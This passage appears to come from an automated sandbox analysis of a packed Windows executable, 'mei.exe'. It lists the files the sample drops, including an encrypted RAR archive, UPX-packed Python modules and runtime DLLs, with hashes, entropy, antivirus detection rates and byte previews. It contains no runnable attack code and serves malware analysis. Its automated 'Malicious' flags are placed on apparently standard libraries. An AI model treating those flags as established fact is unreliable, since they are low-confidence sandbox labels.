                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:L...s>pe.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........S....c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP................../...... ...X.~..........4.......C:\Users\user\AppData\Local\Temp\RES6964.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.g.o.v.k.1.s.p...d.l.l.....(.....L.e.g.a.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\XiW2X.zip

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe
                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):694830
                                                                                                                                                                    Entropy (8bit):7.999694094540915
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:12288:Iklcw7Aqld4vI9u3e7GQVpG8/7NRVe8dXFE/xy+DtIAPagbLpufE0JcRAt3j41DU:Plcw7Ac9/7e8jNa//xTDtIAPWEKeAB0U
                                                                                                                                                                    MD5:EAD1CA1AB936C64498A14EE3424DA7C1
                                                                                                                                                                    SHA1:A8A991416561424A4ABF9032F704D2C62ADA762D
                                                                                                                                                                    SHA-256:7D415CE5C937AC10FB2A2BD0D0B42B102CA4F1F02BA22A8507F33EF2DCB42F69
                                                                                                                                                                    SHA-512:6852F9D7114ADE4807F7F490DCA9892404805896B835C2FD4B10BE12D6F0211239C0851883AE0601B505499AE1D978B77830FD719EE555F70A5B2D4ECF214179
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:Rar!......y}!......z.f.}..N..A.L]..RWth..Q.g.F..6......f.............$a..8IRRw...k...{.~#....78......59.g-.........&..VA.l.<..$b..G......AujG.P0"B..Tg...|...#J.E..C...J.2.UVH...h+<.O.0....(..`E9...[.AFw......6:j.,.`}...V...B....W.D:."......C....f........#W..4.....IfZ'...Lc.........t..q..0Z....p..-..]..._El..WO./".#.&...C....".e.gV...*..9.Z..8.B...k.O..0..T....C+.....d..2....o..@......8..w(8."...z%Q..%m..ZNLN<...>...jP.zM.........U|.H....hun^Q.2m>y.l.9.......b.x.[.c$..->.....!v<...9 8..WQ]..f..rsJm.M...y.i0.[...fx.D......k...+]..D..$k.c..l....8..:E...e.L;.P.,UYo<@..6.q4...e>4Q._.?.D.0 |..vI...Q..o..sK.ur*6.t.i~]..#Y.....sje[..3]V.....(.#....ZO`;...-..#.v..gW.}.U....7.~.y..M..p$.b>5..:..;..Q.J.......NO[.-.l.H..%W.G.Lj9g%.@.6.v..n.C{...y.......gyq..X#..t...$)4.&.8Gx.Dr.7|.~$F............t..4A..L....~..t..}..CL....B.0VC.Y.3..a..c..MnX..i..M%.Oi..Z/........Uc..'%..rJ....G........,..M.+Y......u.2.@.#....t....+...T.|*..`.*..4`.Y.wC.t=z,h.Y

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):109392
                                                                                                                                                                    Entropy (8bit):6.641929675972235
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                    MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                    SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                    SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                    SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49432
                                                                                                                                                                    Entropy (8bit):7.8135914033786475
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:65xdYKhY/Y5bQMskWu3IVCVJv7SyhJDxhy:yxdYKS/Y5RJRIVCVJvXpy
                                                                                                                                                                    MD5:20A7ECFE1E59721E53AEBEB441A05932
                                                                                                                                                                    SHA1:A91C81B0394D32470E9BEFF43B4FAA4AACD42573
                                                                                                                                                                    SHA-256:7EBBE24DA78B652A1B6FE77B955507B1DAFF6AF7FF7E5C3FA5AC71190BDE3DA8
                                                                                                                                                                    SHA-512:99E5D877D34EBAAAEB281C86AF3FFF9D54333BD0617F1366E3B4822D33E23586EF9B11F4F7DD7E1E4A314C7A881F33123735294FE8AF3A136CD10F80A9B8D902
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d......e.........." ...#............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):59672
                                                                                                                                                                    Entropy (8bit):7.82957734909026
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:aMUOlRrHrPcX1nBeXfeIO/h8mLwj46IVLPZp7SyIx9:aBOLL0FnIXm/yk6IVLPZpo
                                                                                                                                                                    MD5:5006B7EA33FCE9F7800FECC4EB837A41
                                                                                                                                                                    SHA1:F6366BA281B2F46E9E84506029A6BDF7948E60EB
                                                                                                                                                                    SHA-256:8F7A5B0ABC319BA9BFD11581F002E533FCBE4CA96CEDD37656B579CD3942EF81
                                                                                                                                                                    SHA-512:E3E5E8F471A8CA0D5F0091E00056BD53C27105A946CA936DA3F5897B9D802167149710404386C2ED3399B237B8DA24B1A24E2561C436ED2E031A8F0564FBBC7C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.....................).....).....).....).....O...............W.......c.O.....O.....O.o...O.....Rich..........................PE..d......e.........." ...#.........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):109336
                                                                                                                                                                    Entropy (8bit):7.933037133644081
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:9Ot51H+NnBZBmb1fZGlHc9ye/U65Qka1RkT1IJ5NrIecwgWN/xiNIVOqHC07SyiY:AzanBZkGlmRc1en8R/iIVOqHC0r
                                                                                                                                                                    MD5:D0231F126902DB68D7F6CA1652B222C0
                                                                                                                                                                    SHA1:70E79674D0084C106E246474C4FB112E9C5578EB
                                                                                                                                                                    SHA-256:69876F825678B717C51B7E7E480DE19499D972CB1E98BBFD307E53EE5BACE351
                                                                                                                                                                    SHA-512:B6B6BFD5FDE200A9F45AEB7F6F845EAC916FEEEF2E3FCA54E4652E1F19D66AE9817F1625CE0ED79D62E504377011CE23FD95A407FBDBAA6911A09E48B5EF4179
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d......e.........." ...#.p...................................................0............`..........................................,..P....)....... ..........$'...........-..........................................@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):36632
                                                                                                                                                                    Entropy (8bit):7.654026577022311
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:V35lZrQBDJLFSRN0cp71I6Pm9zje2pojcIVOI8a5YiSyvELAMxkE1R1:R5YbLkfzpIwm9zK1jcIVOI847SyMrxZz
                                                                                                                                                                    MD5:A81E0DF35DED42E8909597F64865E2B3
                                                                                                                                                                    SHA1:6B1D3A3CD48E94F752DD354791848707676CA84D
                                                                                                                                                                    SHA-256:5582F82F7656D4D92ED22F8E460BEBD722E04C8F993C3A6ADCC8437264981185
                                                                                                                                                                    SHA-512:2CDA7348FAFFABC826FB7C4EDDC120675730077540F042D6DC8F5E6921CF2B9CB88AFCD114F53290AA20DF832E3B7A767432EA292F6E5B5B5B7D0E05CF8905A6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(t..F'..F'..F'..'..F'u.G&..F'u.C&..F'u.B&..F'u.E&..F'..G&..F'..G&..F'..G'B.F'..K&..F'..F&..F'...'..F'..D&..F'Rich..F'................PE..d......e.........." ...#.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):87832
                                                                                                                                                                    Entropy (8bit):7.91494851779059
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:0xMcTNiSSlZFto5ChAwRYMekiq/xFQhIHFB38EtW9ue20dcwfgpPzLNLJcIVZ1Ch:ATJitRLeZq/fZH3Ns9D2WcGgthLGIVZI
                                                                                                                                                                    MD5:F8B61629E42ADFE417CB39CDBDF832BB
                                                                                                                                                                    SHA1:E7F59134B2BF387A5FD5FAA6D36393CBCBD24F61
                                                                                                                                                                    SHA-256:7A3973FEDD5D4F60887CF0665BCB7BD3C648AD40D3AE7A8E249D875395E5E320
                                                                                                                                                                    SHA-512:58D2882A05289B9D17949884BF50C8F4480A6E6D2B8BD48DFDBCB03D5009AF64ABF7E9967357AEEBF95575D7EF434A40E8AD07A2C1FE275D1A87AA59DCC702D6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T"#.5Lp.5Lp.5Lp.M.p.5Lp.IMq.5Lp.IIq.5Lp.IHq.5Lp.IOq.5LpnHMq.5Lp.MMq.5Lp.5Mp.5LpnHAq.5LpnHLq.5LpnH.p.5LpnHNq.5LpRich.5Lp................PE..d......e.........." ...#. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26392
                                                                                                                                                                    Entropy (8bit):7.484232189428478
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:PtihFuym2pDjIVQU8v5YiSyvyxAMxkE44:sXmqjIVQU8B7Sy+xE4
                                                                                                                                                                    MD5:0DA22CCB73CD146FCDF3C61EF279B921
                                                                                                                                                                    SHA1:333547F05E351A1378DAFA46F4B7C10CBEBE3554
                                                                                                                                                                    SHA-256:E8AE2C5D37A68BD34054678AE092E2878F73A0F41E6787210F1E9B9BB97F37A0
                                                                                                                                                                    SHA-512:9EECE79511163EB7C36A937F3F2F83703195FC752B63400552CA03D0D78078875FF41116EBAEB05C48E58E82B01254A328572096A17AAAD818D32F3D2D07F436
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:WX.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.L[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........PE..d......e.........." ...#.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):44312
                                                                                                                                                                    Entropy (8bit):7.717509871918743
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:woQ8MABQVaAwmySb0TrgeBYdEpZbqIVLwJF65YiSyvTAMxkEY:woTIzwF/JbqIVLwJFY7SyLxU
                                                                                                                                                                    MD5:C12BDED48873B3098C7A36EB06B34870
                                                                                                                                                                    SHA1:C32A57BC2FC8031417632500AA9B1C01C3866ADE
                                                                                                                                                                    SHA-256:6C4860CB071BB6D0B899F7CA2A1DA796B06EA391BAC99A01F192E856725E88AA
                                                                                                                                                                    SHA-512:335510D6F2F13FB2476A5A17445CA6820C86F7A8A8650F4FD855DD098D022A16C80A8131E04212FD724957D8785AD51CCAFF532F2532224CCFD6CE44F4E740F9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.+.".E.".E.".E.+...$.E...D. .E...@./.E...A.*.E...F.!.E...D. .E.".D...E.i.D.%.E...H.#.E...E.#.E....#.E...G.#.E.Rich".E.........................PE..d......e.........." ...#.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):57624
                                                                                                                                                                    Entropy (8bit):7.832914003064299
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:Nw9DUaMjfQ0G17k3Gq+m3SvZ6XhH60CSLMIVOQZu7Sypx/:ezMjYfwPzR60qIVOQZuB
                                                                                                                                                                    MD5:63618D0BC7B07AECC487A76EB3A94AF8
                                                                                                                                                                    SHA1:53D528EF2ECBE8817D10C7DF53AE798D0981943A
                                                                                                                                                                    SHA-256:E74C9CA9007B6B43FF46783ECB393E6EC9EBBDF03F7C12A90C996D9331700A8B
                                                                                                                                                                    SHA-512:8280F0F6AFC69A82BC34E16637003AFB61FEE5D8F2CAB80BE7D66525623EC33F1449B0CC8C96DF363C661BD9DBC7918A787ECAFAAA5D2B85E6CAFDCF0432D394
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.g...g...g.......g.......g.....g.......g.......g.......g..q....g.......g...g...f..q....g..q....g..q..g..q....g..Rich.g..........................PE..d......e.........." ...#.........`.. ....p...................................0............`..........................................+..P....)....... .......................+..$................................... ...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):66840
                                                                                                                                                                    Entropy (8bit):7.864649468753277
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:HbCYwNqce1LbV8uQvTLwNsDgzg+JR15xzf5/5JrwIVC7y3S7Syykx0:HuYwNABQQxzhRTxTx5JcIVC7yCa
                                                                                                                                                                    MD5:E52DBAEBA8CD6CADF00FEA19DF63F0C1
                                                                                                                                                                    SHA1:C03F112EE2035D0EAAB184AE5F9DB89ACA04273A
                                                                                                                                                                    SHA-256:EAF60A9E979C95669D8F209F751725DF385944F347142E0ECDCF2F794D005EAD
                                                                                                                                                                    SHA-512:10EEF8FD49E2997542E809C4436AD35DCC6B8A4B9B4313AD54481DAEF5F01296C9C5F6DEDAD93FB620F267AEF46B0208DEFFBAD1903593FD26FD717A030E89E8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.+.4.x.4.x.4.x.L)x.4.x.H.y.4.x.H.y.4.x.H.y.4.x.H.y.4.xiI.y.4.x.4.x>5.x.L.y.4.xiI.y.4.xiI.y.4.xiIEx.4.xiI.y.4.xRich.4.x................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... .......................,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.000453125279667
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:IFJWyhWYU8JIYiaHZ8ZpH3GCJETyKQ+H9w:wWYiQZiRBETfQGw
                                                                                                                                                                    MD5:D8A49ED128F67863A28E985FE39E4382
                                                                                                                                                                    SHA1:18B6C21CA9A850703F590DB678F8FA5B8EAF3659
                                                                                                                                                                    SHA-256:0F03DAF30DAAC7E3547AE9017FC8A1BBB1A9C3DD97E8E6B1315D69B4E7FC7409
                                                                                                                                                                    SHA-512:C1FBDF8789D90EEDA07EF6D8E6AF05AA33A2C4F20D9B78D73E3AF0CB595442DED5CA23084751FA5B254F9389B6DFC11BCA499B4DB3D0A94D0333FC27DA5C1A73
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@......;3....`A........................................p...,............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.86417016115993
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:LWyhWfU8JIYiaHZ8ZpH3GCJEY9YySnPj5:RPYiQZiRBEY9Ytt
                                                                                                                                                                    MD5:2F1171FF0CDE5C4B3ED56F5BF9CFEDD3
                                                                                                                                                                    SHA1:51BA61BAAF451962EA4A1D2F88AA7147D4180BFA
                                                                                                                                                                    SHA-256:E19241E058D2986759DDD4163E56DD75BB440FBDECA3B65E0318D010E34A9067
                                                                                                                                                                    SHA-512:41D673D194773997586EF7768DAA0A977404F4216DF6549FFEB4A8D2C642D8BEF1E67B4E87BE6AC6F73075DB1F3F81B4DAE7E218A7B77D6DEEF5CABE335D3D12
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.862926377479337
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:VWyhW5USwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfRyU3e5nvyr:VWyhW5U8JIYiaHZ8ZpH3GCJEpyUO5qr
                                                                                                                                                                    MD5:0296B35ECE88295D3BA91FA71093A500
                                                                                                                                                                    SHA1:A29E769144D4D55410C5E2D80C6E930384B07257
                                                                                                                                                                    SHA-256:C86071A3F70B36AAE955D70C16A38C557EF6B694BF9C54205B8CC503057DE84A
                                                                                                                                                                    SHA-512:4892739FE33F4ABA900A315DFD63657264E7D6893AE3133B5ABAB289677E83FFD26E4C499591BCD3F99D2DECBB88C4598266AEDECBA3AA04EF84A3D72EB0AA4B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@...........`A........................................p................0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.90602949196874
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:BzmxD3T4qPWyhWbUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfByFfrYRf:BzQ5WyhWbU8JIYiaHZ8ZpH3GCJEpyW5
                                                                                                                                                                    MD5:C84423A9FA3A729F69002FBCFC7D48E5
                                                                                                                                                                    SHA1:D8516A5028EEAAAAC8F614DAF504F0F25217E9A3
                                                                                                                                                                    SHA-256:E5276F9127938300D412CBB4F96101BAD34326F9E5498C19399C042840159B71
                                                                                                                                                                    SHA-512:B5860E4B761B44342898BBF87B32C64FBFE05DCCA7572DE597E964A1129E5FC0C26D75C0DF06CB9EC34C566670D0F00D1634A58CDD37FA2D2506E72D2C0703B7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@......G.....`A........................................p................0...............0...)..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
